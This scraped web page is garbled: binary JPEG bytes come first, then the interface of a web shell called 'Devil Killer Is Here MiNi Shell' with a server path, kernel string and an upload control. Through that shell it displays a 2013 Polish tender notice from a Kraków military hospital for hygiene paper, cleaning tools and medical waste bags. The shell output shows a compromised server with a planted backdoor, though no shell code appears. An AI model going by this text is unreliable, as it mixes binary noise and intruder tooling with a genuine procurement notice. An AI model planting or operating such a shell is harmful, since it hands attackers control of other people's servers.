JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130118/10533-N-2013.html

<p class="kh_header"><b>Kraków: DOSTAWA PAPIEROWYCH ŚRODKÓW HIGIENICZNYCH I DROBNEGO SPRZĘTU DO UTRZYMANIA HIGIENY W SZPITALU</b><br>
<b>Numer ogłoszenia: 10533 - 2013; data zamieszczenia: 18.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką Samodzielny Publiczny ZOZ , ul. Wrocławska 1-3, 30-901 Kraków, woj. małopolskie, tel. 12 63 08 099, faks 12 63 08 099.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wszk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA PAPIEROWYCH ŚRODKÓW HIGIENICZNYCH I DROBNEGO SPRZĘTU DO UTRZYMANIA HIGIENY W SZPITALU.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> PAKIET I. ŚRODKI HIGIENICZNE										
Lp.	Szczegółowa nazwa przedmiotu zamówienia
 ( charakterystyka, wymiary itp..)	Kod CPV	J.m.	Ilość jednostek miary	Cena jedn.netto za j.m.	Stawka VAT %	Wartość netto w PLN	VAT w PLN	Wartość brutto w PLN	Producent, nazwa środka
										
1.	Papier toaletowy w mini jumbo roli, jednowarstwowy, makulatura, dł min 240 m, perforowany,wymiary listka minimum 9,7 x 14 cm, gramatura minimum 26,5g/m, średnica rolki minimum 18,5 cm.	33761000-2	rolka	3740						
2.	Ręcznik w składce ZZ, biały, jednowarstwowy, gofrowany. Surowiec ; krep ekologiczny. Gramatura minimum 35 g/m.2 Rozmiar listka min. 25x21cm. Ilość listków w opakowaniu 200. Karton - 20 opakowań po 200 listków.	33763000-6	karton	900						
3.	Ręcznik w roli centralnego dozowania, biały bez gilzy, celuloza, 2 warstwy, gramatura minimum 2x19 g/m, długość min. 60 m. Opakowanie 12 rolek.	33763000-6	rolka	40000						
4.	Ręcznik biały, 2 warstwowy, wykonany w technologii hybrid, pasujący do dozownika z gilotynowym systemem dozowania ręcznika. Długość minimum 150 metrów. Szerokość rolki 21 cm, średnica 19 cm, Opakowania po 6 sztuk.Ręcznik wraz z plugiem ułatwiającym montaż, który jest integralną częścią ręcznika, pasujący do dozowników funkcjonujących w szpitalu.	33763000-6	rolka	3355						
5.	Papier toaletowy, 2-warstwowy, kolor biały, minimum 400 listków.Długość min. 49,6 m. Średnica rolki minimum 12,5 cm, wymiar listka 9,7cm x 12,4. Ilość rolek w opakowaniu zbiorczym: 30. 	33761000-2	rolka	31170						
6.	Prześcieradło papierowe w roli, celuloza,2 warstwy, kolor biały, wymiary minimum;szerokość roli od 50- 60 cm, długość od min.79m- 80 m.Średnica rolki 13-14cm, gramatura min. od 2x 15-17,5 g/m.	33772000-2	rolka	1190						
7.	Czyściwo białe,jednowarstwowe makulaturowe, szerokość od 23- 24,5cm, długość od 1000m- 1400m.Wysoka wytrzymałość zapewniająca skuteczne osuszanie rąk. 	33770000-8	rolka	121						
8.	Worek papierowy, dwuwarstwowy,o wymiarach 1100mmx600mm, dno przeszywane lub płaskie klejone.	33772000-2	szt	2960,00						
	RAZEM									

PAKIET II. DROBNY SPRZĘT										
	Szczegółowa nazwa przedmiotu zamówienia
 ( charakterystyka, wymiary itp..)	Kod CPV	J.m.	Ilość jednostek miary	Cena jed.netto za j.m.	Stawka VAT %	Wartość netto w PLN	VAT w PLN	Wartość brutto w PLN	Producent, nazwa środka
										
1.	Kosz na śmieci typu Curver z pedałem 25 l. Kolor niebieski lux. Wymiary 360x360 x410mm	39224340-3	szt	25						
2.	Wolnostojąca szczotka WC wykonana z polipropylenu, koloru niebieskiego	39224310-4	szt	20						
3.	Wielofunkcyjna szczotka do zamiatania schodów, klatek, korytarzy, podłóg wraz z drązkiem .	39224100-9	szt	10						
4.	Pojemniki plastikowe z polietylenu z pokrywami nakładanymi, prostokątne, koloru niebieskiego,o poj. (min. 100 l - max 120l).	39290000-1	szt	2						
5.	Szczotka do czyszczenia kaloryferów żebrowych ze sztywnego włosia, ze sprężystym mocowaniem	39224300-1	szt	30						
6.	Szczotka do mycia butelek o wąskich szyjkach ze sztywnego włosia i spręzystm mocowaniem.	39224300-1	szt	30						
7.	Wycieraczka wewnętrzna, podgumowana typu FINKA o wymiarach 60x90 cm	39532000-0	szt	10						
8.	Wycieraczka wewnętrzna, podgumowana typu FINKA o wymiarach 90x260cm	39532000-0	szt	1						
9.	Wycieraczki wewnętrzne, podgumowane,czarne, typu FINKA o wymiarach 90x150cm	39532000-0	szt	5						
10.	Gąbka do kąpieli typu Tęcza o wymiarach 108/108/45	39224320-7	szt	100						
11.	Miotła typu SORGO	39224100-9	szt	7						
	RAZEM									

I.PAKIET III 
PADY, MOPY,
ŚCIERECZKI										
Lp	Nazwa towaru 	Kod CPV	J.m.	Ilość jednostek miary	Cena jed.netto za j.m.	Stawka VAT %	Wartość netto w złotych	VAT w PLN	Wartość brutto w złotych	Nazwa środka/Producent
1.	Uniwersalny kij teleskopowy, konstrukcji 100-180cm, rączka w kolorze niebieskim z obrączkami kolorystycznymi, na końcu kija gumowa obręcz antyposlizgowa.		szt	10						
2.	Pad biały poliestrowy do polerki Taski Ergo Disc 1200. Wymiary 505mm x85mm		szt	5						
3.	Pad poliestrowy do szorowarki Taski Ergo Disc 165. Wymiary 432mm x85 mm. Czarny 5szt,zielony 5szt, czerwony 4szt.		szt	14						
4.	Mop tkany, kieszeniowo - taśmowy o wysokiej zdolności czyszczącej, trójskładnikowa kombinacja mopa; biały -mikrofaza, szary - poliester, beżowy - bawełna/wiskoza. Wszyte lamelki do kodowania kolorystycznego stref czystości.Na wewnętrznej stronie mopa nadruk 5WSzK. Wysokośc nadruku 3 cm.		szt	1000						
5.	Ściereczka do kurzu w roli , koloru niebieskiego. Opakowanie rolka, 110 ściereczek	39525100-9	rolka	3						
6.	Ścierka mikrofazowa o wymiarach 40x40cm, gramatura 170 gr m2, koloru niebieskiego.Nadruk na ściereczce 5 WSzK. Wysokośc 3 cm	39525800-6	szt	250						
7.	Ścierka mikrofazowa o wymiarach 40x40cm, gramatura 170 gr m2, koloru żółtego.Nadruk na ściereczce 5 WSzK. Wysokośc 3 cm	39525800-6	szt	200						
8.	Ścierka mikrofazowa o wymiarach 40x40cm, gramatura 170 gr m2, koloru czerwonego.Nadruk na ściereczce 5 WSzK. Wysokośc 3 cm	39525800-6	szt	150						
9.	Ścierka mikrofazowa o wymiarach 40x40cm, gramatura 170 gr m2, koloru zielonego.Nadruk na ściereczce 5 WSzK. Wysokośc 3 cm	39525600-4	szt	100						
	RAZEM									

PAKIET IV - WORKI NA ODPADY										
Lp	Nazwa towaru 	Kod CPV	J.m.	Ilość jednostek miary	Cena jed.netto za j.m.	Stawka VAT %	Wartość netto w złotych	VAT w PLN	Wartość brutto w złotych		Nazwa środka/Producent
1.	Worki jednorazowego użycia na odpady medyczne z folii polietylenowej, ,nieprzezroczyste czerwone.Grubość - 0,07 mm, wym.600mm x1200mm. 1 rolka 25 szt. Zgrzewka -10 rolek.	18930000-7	rolka	2000	10,00						
2.	Worki jednorazowego użycia na odpady medyczne z folii polietylenowej, nieprzezroczyste, czerwone, grubość 0,05 mm, wym. 500mm x 600 mm . 1 rolka 25 szt. Zgrzewka -20 rolek	18930000-7	rolka	1850	5,00						
3.	Worki jednorazowego użycia na odpady medyczne z folii polietylenowej, nieprzezroczyste, niebieskie. Grubość 0,05 mm, wym. 500mm x 600 mm . 1 rolka - 25 szt.Zgrzewka - 20 rolek	18930000-7	rolka	2080	5,00						
4.	Worki jednorazowego użycia na odpady medyczne z folii polietylenowej, nieprzezroczyste niebieskie.Grubość; 0,07mm,wym.600mm x 1200mm. 1 rolka -25 szt. Zgrzewka 10 rolek.	18930000-7	rolka	2160	10,00.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.76.10.00-2, 33.76.30.00-6, 33.77.00.00-8, 39.22.43.40-3, 39.22.43.10-4, 39.22.41.00-9, 39.29.00.00-1, 39.22.43.00-1, 18.93.00.00-7, 39.53.20.00-0, 39.52.51.00-9, 39.52.58.00-6, 39.52.56.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału  w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału  w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału  w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału  w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału  w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony FORMULARZ OFERTOWY - według ZAŁĄCZNIKA NR 2 do SIWZ.
2. Wypełniony we wskazanych miejscach - FORMULARZ CENOWY - OPIS PRZEDMIOTU ZAMÓWIENIA - według ZAŁĄCZNIKA NR 1 do SIWZ.
3. Pełnomocnictwo umocowujące przynajmniej w zakresie podpisania oferty w postępowaniu 
o udzielenie zamówienia publicznego, dołączone do oferty, o ile nie wynika z innych dokumentów, załączonych przez Wykonawcę. 4. Oświadczenie Wykonawcy, w trybie art. 44 ustawy, dotyczące spełnienia warunków udziału w postępowaniu ściśle według formularza stanowiącego ZAŁĄCZNIK NR 3 do SIWZ, a także ZAŁĄCZNIK NR 3A i co za tym idzie pisemne celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (o ile dotyczy).
5. Aktualny odpis z właściwego rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo w przypadku osób fizycznych oświadczenie  o braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy zgodnie z załącznikiem nr 4.
6. Karta techniczna dla poz. 1,2,3,4,5,6,7,8 - dotyczy Pakietu nr 1
7. Karta techniczna asortymentu dla wszystkich pozycji z danymi zawartymi w szczegółowym opisie przedmiotu zamówienia - dotyczy Pakiet nr 2,3.
8. Karta techniczna dla poz. 1,2,3,4 - dotyczy Pakietu nr 4.
9. Próbka do wglądu - 1 szt. (1 worek ) dla każdej pozycji - dotyczy Pakietu nr 4.
10. Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt  5 składa odpowiedni dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
11.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 10, zastępuje się je dokumentem zawierającym oświadczenie Wykonawcy złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - w zakresie dat wystawienia dokumentów, przepisy punktu 10 stosuje się odpowiednio.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Kupujący dopuszcza możliwość zmiany treści niniejszej umowy w zakresie wskazanym w powyższych paragrafach oraz w zakresie:
zmiany świadczenia Sprzedającego na świadczenie lepszej jakości przy zachowaniu tożsamości towaru, lub asortymentu objętego dzierżawą
wydłużenia terminu wykonania umowy z powodu okoliczności niezależnych od Sprzedającego,
zmiany danych Sprzedającego ( np. zmiana siedziby, adresu, nazwy),
zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Kupującego powodujących iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia
omyłek pisarskich lub błędów rachunkowych,
mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Kupującego
innych zmian korzystnych dla Kupującego, w tym polegających na zamianie elementów zamówienia na elementy o lepszych lub/i odpowiedniejszych parametrach technicznych chociażby wiązało się to z koniecznością zmiany terminu lub sposobu wykonania zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.5wszk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamówienia Publiczne, (budynek komendy), ul. Wrocławska 1-3, 30 - 901 Kraków..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2013 godzina 11:00, miejsce: Kancelaria Szpitala, (budynek komendy), ul. Wrocławska 1-3, 30 - 901 Kraków..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET I. ŚRODKI HIGIENICZNE										
Lp.	Szczegółowa nazwa przedmiotu zamówienia
 ( charakterystyka, wymiary itp..)	Kod CPV	J.m.	Ilość jednostek miary	Cena jedn.netto za j.m.	Stawka VAT %	Wartość netto w PLN	VAT w PLN	Wartość brutto w PLN	Producent, nazwa środka
										
1.	Papier toaletowy w mini jumbo roli, jednowarstwowy, makulatura, dł min 240 m, perforowany,wymiary listka minimum 9,7 x 14 cm, gramatura minimum 26,5g/m, średnica rolki minimum 18,5 cm.	33761000-2	rolka	3740						
2.	Ręcznik w składce ZZ, biały, jednowarstwowy, gofrowany. Surowiec ; krep ekologiczny. Gramatura minimum 35 g/m.2 Rozmiar listka min. 25x21cm. Ilość listków w opakowaniu 200. Karton - 20 opakowań po 200 listków.	33763000-6	karton	900						
3.	Ręcznik w roli centralnego dozowania, biały bez gilzy, celuloza, 2 warstwy, gramatura minimum 2x19 g/m, długość min. 60 m. Opakowanie 12 rolek.	33763000-6	rolka	40000						
4.	Ręcznik biały, 2 warstwowy, wykonany w technologii hybrid, pasujący do dozownika z gilotynowym systemem dozowania ręcznika. Długość minimum 150 metrów. Szerokość rolki 21 cm, średnica 19 cm, Opakowania po 6 sztuk.Ręcznik wraz z plugiem ułatwiającym montaż, który jest integralną częścią ręcznika, pasujący do dozowników funkcjonujących w szpitalu.	33763000-6	rolka	3355						
5.	Papier toaletowy, 2-warstwowy, kolor biały, minimum 400 listków.Długość min. 49,6 m. Średnica rolki minimum 12,5 cm, wymiar listka 9,7cm x 12,4. Ilość rolek w opakowaniu zbiorczym: 30. 	33761000-2	rolka	31170						
6.	Prześcieradło papierowe w roli, celuloza,2 warstwy, kolor biały, wymiary minimum;szerokość roli od 50- 60 cm, długość od min.79m- 80 m.Średnica rolki 13-14cm, gramatura min. od 2x 15-17,5 g/m.	33772000-2	rolka	1190						
7.	Czyściwo białe,jednowarstwowe makulaturowe, szerokość od 23- 24,5cm, długość od 1000m- 1400m.Wysoka wytrzymałość zapewniająca skuteczne osuszanie rąk. 	33770000-8	rolka	121						
8.	Worek papierowy, dwuwarstwowy,o wymiarach 1100mmx600mm, dno przeszywane lub płaskie klejone.	33772000-2	szt	2960,00						
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.76.10.00-2, 33.76.00.00-6, 33.76.10.00-2, 33.77.70.00-2, 33.77.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 34.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET II. DROBNY SPRZĘT										
	Szczegółowa nazwa przedmiotu zamówienia
 ( charakterystyka, wymiary itp..)	Kod CPV	J.m.	Ilość jednostek miary	Cena jed.netto za j.m.	Stawka VAT %	Wartość netto w PLN	VAT w PLN	Wartość brutto w PLN	Producent, nazwa środka
										
1.	Kosz na śmieci typu Curver z pedałem 25 l. Kolor niebieski lux. Wymiary 360x360 x410mm	39224340-3	szt	25						
2.	Wolnostojąca szczotka WC wykonana z polipropylenu, koloru niebieskiego	39224310-4	szt	20						
3.	Wielofunkcyjna szczotka do zamiatania schodów, klatek, korytarzy, podłóg wraz z drązkiem .	39224100-9	szt	10						
4.	Pojemniki plastikowe z polietylenu z pokrywami nakładanymi, prostokątne, koloru niebieskiego,o poj. (min. 100 l - max 120l).	39290000-1	szt	2						
5.	Szczotka do czyszczenia kaloryferów żebrowych ze sztywnego włosia, ze sprężystym mocowaniem	39224300-1	szt	30						
